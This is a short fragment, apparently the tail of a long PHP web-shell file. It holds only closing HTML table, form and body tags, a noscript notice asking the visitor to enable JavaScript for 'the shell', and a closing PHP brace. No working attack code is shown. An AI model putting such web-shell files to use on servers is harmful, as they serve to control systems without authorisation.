7956 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
7957 </tr>
7958 </table>
7959 </div>
7960
7961 </form>
7962 </center>
7963<br>
7964
7965</body>
7966</html>
7967<?php
7968}
7969?>